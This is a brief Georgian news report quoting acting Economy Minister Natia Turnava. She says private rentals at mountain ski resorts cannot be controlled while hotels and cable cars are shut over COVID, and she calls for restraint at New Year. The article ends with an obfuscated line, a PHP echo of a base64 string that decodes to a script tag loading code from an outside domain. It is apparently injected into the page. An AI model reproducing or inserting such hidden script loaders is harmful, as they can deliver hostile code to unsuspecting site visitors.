celsiusi
ავერსი შნაიდერი
ეკონომიკის მინისტრის მოვალეობის შემსრულებლის ნათია თურნავას განცხადებით, "მთის კურორტებზე კერძო ბინებისა და კოტეჯების კონტროლი შეუძლებელია". ამის შესახებ მან საკოორდინაციო საბჭოს დასრულების შემდეგ ჟურნალისტის იმ კითხვის საპასუხოდ განაცხადა, რომელიც კურორტებზე სასტუმროების და საბაგიროების ოპერირების შეზღუდვების პარალელურად, კერძო ბინების გაქირავებას შეეხებოდა.
 
„სამთო-სათხილამურო კურორტებზე გაჩერებულია საქმიანობა არა მხოლოდ დიდი ზომის სასტუმროებისთვის, არამედ ნებისმიერი სასტუმროსთვის და ეს მნიშვნელოვანია. გარდა ამისა, ჩვენ შევაჩერეთ საბაგიროების მუშაობა, რაც ასევე მნიშვნელოვანია, რადგან ის დამსვენებლები, რომლებიც სათხილამუროდ ადიოდნენ ამ კუროპრტებზე, ამ პერიოდში არ ავლენ. რაც შეეხება კერძო ბინების გაქირავებას ან საკუთარ სახლში თუ ვინმე ავა, ამის კონტროლი, რა თქმა უნდა, შეუძლებელია“, - განაცხადა ნათია თურნავამ.
 
ამასთან, მინისტრის მოვალეობის შემსრულებელმა ვირუსის გავრცელებიდან გამომდინარე სიკვდილიანობის მაღალი მაჩვენებლის გამო მოსახლეობას მეტი პასუხისმგებლობისკენ მოუწოდა და დასძინა, რომ კერძო სახლების გაქირავება თვითშეგნების საკითხია.
 
„მოვუწოდებთ მოსახლეობას, რომ პასუხისმგებლიანად მოეკიდოს ამ პერიოდს, რადგან ეს არ არის ჩვეულებრივი ახალი წელი და ვხედავთ, რომ ვირუსის გამო უამრავი ადამიანი იღუპება. საზოგადოება ამას გაგებით უნდა მოეკიდოს და ამ ახალ წელს ნაკლები ზეიმი და მეტი პასუხისმგებლობა უნდა გამოიჩინონ. რა თქმა უნდა, კერძო სახლებში ჩვენ ვერ შევალთ, ეს უკვე თვითშეგნების ამბავია“, - განაცხადა თურნავამ.
 
1560
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");